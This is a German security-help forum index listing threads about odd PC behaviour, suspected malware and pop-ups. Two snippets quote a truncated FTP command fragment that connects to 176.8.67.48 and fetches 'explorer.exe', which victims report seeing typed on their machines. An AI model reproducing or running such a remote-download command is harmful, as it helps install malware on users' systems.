Zurück   Trojaner-Board > Themen

Alles zum Thema: Merkwürdiges

  Letzter Beitrag Antworten Hits Forum
merkwürdiges Verhalten von ESET
Merkwürdiges - ESET meldet immer wieder neue unbekannte Geräte die die gleiche IP haben. was kann dahinter stecken? Malware oder Trojaner: Danke für die Hilfe
Antiviren-, Firewall- und andere Schutzprogramme
Pc-Freeze/Absturz
Merkwürdiges - Hallo liebes Team, Habe seit heute ständige pc-Hänger (freezes) bis zu pc-Abstürzen. Und das schon beim booten des PCs. Was mir nach einiger Zeit aber merkwürdiges aufgefallen ist, dass sich beim einloggen auf den Desktop plötzlich 5-10 cmd-Fenster öffnen, der Desktop kurz schwarz wird und der...
Alles rund um Windows
Avast installiert sich von selbst
Merkwürdiges - Guten Morgen, auf meinem AMD-Rechner musste ich eben ein merkwürdiges Phänomen beobachten: Ich hatte über Nacht einen Scan mit ESET Online-Scanner laufen und als der durch war habe ich CCleaner auf Version 5.37.6309 aktualisiert. Kurz danach ploppte ein Avast-Dektopsymbol auf :nono:. Daraufhin...
Antiviren-, Firewall- und andere Schutzprogramme
Remaige Werbung in TB-Forum?
Merkwürdiges - Hallo, als ehemaliger Windows User, schaue ich ab und zu hier mal vorbei, und heute ist mir was merkwürdiges aufgefallen: Bin mal in folgendes Thema hinein:http://www.trojaner-board.de/186081-remaige-repair-loeschen.html Und was sehe ich da https://abload.de/img/remaigeb9ugg.png. Wie kann...
Diskussionsforum
Merkwürdiges Pop up Fenster von i.explore.exe
Merkwürdiges - Hallo liebe Helfer, leider glaube ich, dass ich mir etwas auf meinem Rechner gefangen habe. Als ich eine Seite angeklickt habe, erschien ein Fenster: i.explore.exe Ich hatte das noch nie und es kommt mir komisch vor. Hier ein Bildschirmschuss des Fensters Weiß jemand Rat?
Plagegeister aller Art und deren Bekämpfung
Probleme mit "s3.amazonaws.com"
Merkwürdiges - Hallo mal wieder! Ich habe mir vor einiger Zeit ein wohl verseuchtes Add-On für FF heruntergeladen! Cosinus hat mir hervorragend bei der Systembereinigung geholfen. Ich sehe nur immer wieder im Scriptblocker "NoScript" das eine Website mit dem Namen "s3.amazonaws.com" auf ein Script zugreifen...
Plagegeister aller Art und deren Bekämpfung
MSCONFIG (Win 10) hat ein merkwürdiges Verhalten
Merkwürdiges - Hallo zusammen, ich bin neu hier und hoffe alles richtig zu machen... Mein Problem: Ich kann die MSCONFIG nicht verändern - der Punkt "Normaler Systemstart" lässt sich zwar auswählen, wird jedoch nicht abgespeichert... dies hat wohl zu folge das öfters die Meldung kommt "System wurde nicht...
Alles rund um Windows
Dateien werden automatisch in Ordner System32 kopiert
Merkwürdiges - Hallo alle zusammen, mir fällt in regelmäßigen Abständen was Merkwürdiges an meinem Computer auf. Immer wenn ich mich im Internet auf Webseiten wie z.B. Facebook, Instagram oder YouTube aufhalte, bekomme ich aus dem Nirgendwo irgendwelche Dateien in meinem System32-Ordner kopiert. In etwa mittig...
Plagegeister aller Art und deren Bekämpfung
Seltsames Pop-Up in Whatsapp
Merkwürdiges - Schon wieder ich, momentan aber auch Probleme "auf allen Kanälen". Heute kam bei Whatsapp ein merkwürdiges Pop-Up, Inhalt war (ähnlich): "Whatsapp läuft in 4 Wochen ab, bitte auf die neueste Version aktualisieren", darunter 2 Buttons "Ok" und "Abbrechen", ich habe "Abbrechen" getippt, da es mir...
Smartphone, Tablet & Handy Security
Netzwerk-Ordner werden nicht zuverlässig gefunden.
Merkwürdiges - Ich habe ein merkwürdiges Problem: Ich verwende ein Notebook mit Win 8.1 64-bit, Fritzbox 3490 hinter Kabelmodem, ein QNAP-NAS und einige andere Geräte im Heimnetz. Mein Win 8.1 Notebook findet nach dem booten nicht immer meine Netzlaufwerke: Fritz.NAS und QNAP-NAS. Ein anderes Mal werden die...
Antiviren-, Firewall- und andere Schutzprogramme
Symbol lassen sich nicht verschieben uvm....
Merkwürdiges - Hallo liebes Trojaner-Board Team! Ich bin neu hier in diesem Forum. Ich habe ein sehr merkwürdiges Problem und zwar: Ich konnte plötzlich wie auf einen Schlag keine Symbole am Desktop verschieben und (es ist eingestellt Symbole am Raster ausrichten), wenn ich Minecraft starte und auf Play...
Plagegeister aller Art und deren Bekämpfung
Merkwürdige Authentifizierung auf meinen PC
Merkwürdiges - Hallo Ich hatte heute eine Merkwürdiges Kästchen auf meinen Bildschirm wo ich etwas mit meinen Namen und ein Passwort Authentifizierung sollte? Ich weis nicht was es war oder zu welchen Programm es gehört. Ich konnte es auch nicht wegklicken, musste den PC herunterfahren. Die Nummer der...
Alles rund um Windows
Veralteter Video-Player , IE Chrome und FF
Merkwürdiges - Hi alle zusammen, Ich habe das Problem, dass mir eine Seite in IE, Chrom oder FF sozusagen, gewandelt wird in eine Seite bei der ich meinen "veralteten Video-player" aktualisieren soll (Text:Empfohlen, Sie sind das Surfen im Web mit Google Chrome und es wird empfohlen den Video-Player auf die...
Plagegeister aller Art und deren Bekämpfung
Unbekanntes Symbol - verschwindet plötzlich
Merkwürdiges - Guten Abend, wenn ich auf meiner Taskleiste unten rechts auf den kleinen Pfeil "Ausgeblendete Symbole einblenden klicke, taucht manchmal ein merkwürdiges Symbol auf, von dem ich nicht weiß, wo es herkommt. Hier ist es zu sehen (roter Kreis): http://i60.tinypic.com/20rs9bq.jpg Das...
Plagegeister aller Art und deren Bekämpfung
Unbekanntes Symbol in Taskleiste
Merkwürdiges - Hi Leute, hab ein merkwürdiges Symbol, das ich weder anklicken, noch irgend woanders finden kann, in meiner Taskleiste entdeckt, ich kann nicht sagen seit wann es da ist, es ist mir eben erst aufgefallen. Nachdem ich google von unten nach oben abgesucht habe, habe ich nun das Bedenken, dass es...
Plagegeister aller Art und deren Bekämpfung
.scr Datei ausgeführt
Merkwürdiges - Hallo zusammen, ich habe heute gedankenverloren eine Email geöffnet und die darin vorhandene .scr Datei ausgeführt... Das erste was ich danach gemacht habe war natürlich googeln.Ich bin dann im Zusammenhang mit der .scr Datei über Einträge des Sohanad Wurm gefallen.Ich habe die betreffende...
Plagegeister aller Art und deren Bekämpfung
software pdfforge Toolbar v7.6 ein Schädling?
Merkwürdiges - Der Rechner meienr Frau ist bei updates (z.B.Windows update) sehr sehr langsam geworden (im abgesicherten Modus geht alles sehr flink- habe eben den FF V24 in wenigen Sekunden runtergeladen). In der Softwareaufzählung finde ich ein merkwürdiges Programm, welches sich auch nicht deinstallieren...
Plagegeister aller Art und deren Bekämpfung
Maus und Tastatur spielen verrückt.
Merkwürdiges - Hey, Ich habe seit ca. 5 Stunden ein wirklich merkwürdiges Problem.. Ich versuche es einfach mal zu beschreiben. Als Hintergrundinfo: ich benutze derzeit einen Laptop an den ich eine externe Tastatur und Maus angeschlossen habe. Wenn ich diese jedoch anschließe, dann spammen sie zu jeder...
Mülltonne
"DomaIQ Tuguu SLU"
Merkwürdiges - Hallo zusammen, als ich ein Programm deinstallieren wollte, fand ich etwas in der Liste, was mir nicht bekannt ist. Die Suche im Netz hat mir leider nicht verraten, um was es sich hierbei handelt. Es geht um "DomaIQ Tuguu SLU" Ich habe mit avast und Spyware Terminator gescannt, aber es nichts...
Plagegeister aller Art und deren Bekämpfung
Merkwürdiges Popupfenster geht auf!
Merkwürdiges - Guten Tag Ich habe seit einiger Zeit ein Problem mit einem Fenster das rechts unten auf dem Screen aufgeht. Das Fenster hat keinen Inhalt .. ist weiss und fährt langsam von unten hoch. Dieses Fenster taucht immer sporadisch beim Sufen auf und NERVT!! Ich habe Malwarebite schon scannen...
Plagegeister aller Art und deren Bekämpfung
Absender in Email (Newsletter) ist nicht der, von dem der NL wirklich kommt?
Merkwürdiges - Hallo zusammen, meine Freundin hat ein sehr merkwürdiges Problem. Sie bekommt einen Newsletter, in diesem Fall vom WDR wegen einer Kochsendung. Sie öffnet die Mail und darin ist dann ein Newsletter von der Firma Henkel. Sie hat beide NL abonniert aber in der Regel kommen sie einzeln :crazy: und...
Plagegeister aller Art und deren Bekämpfung
Downloads wie Flash, Java oder Firefox Updates laden sehr langsam. Unbekannte Downloads laden jedoch schnell.
Merkwürdiges - Hallo! Ich habe ein merkwürdiges Problem!!! Seit einigen Tagen habe ich riesen Probleme Dateien zu laden, aber lediglich von bekannten herstellern wie z.B. folgendes: Flash Plugin, Firefox Update, Java Plugin. Diese wollen einfach nicht heruntergeladen werden. Wenn ich jedoch einen...
Plagegeister aller Art und deren Bekämpfung
Windows entwickelt merkwürdiges Eigenleben
Merkwürdiges - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get...
Plagegeister aller Art und deren Bekämpfung
Merkwürdiges Problem unter Windows XP
Merkwürdiges - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get explorer.exe .. eq 7echo quit .. eq 7ftp ßn ßsöeq...
Alles rund um Windows
My little Pony Virus?
Merkwürdiges - Hallo Liebes Forum, ich hatte gerade einen relativ verwirrten Kunden der mir ein sehr merkwürdiges Problem schilderte. Er redete von einem "My Little Pony" Virus , weil sich halt ständig Popups und animationen dieser Kinder Serie auf seinen Konsolen und PC's öffnet. Da ich nich ganz so in...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.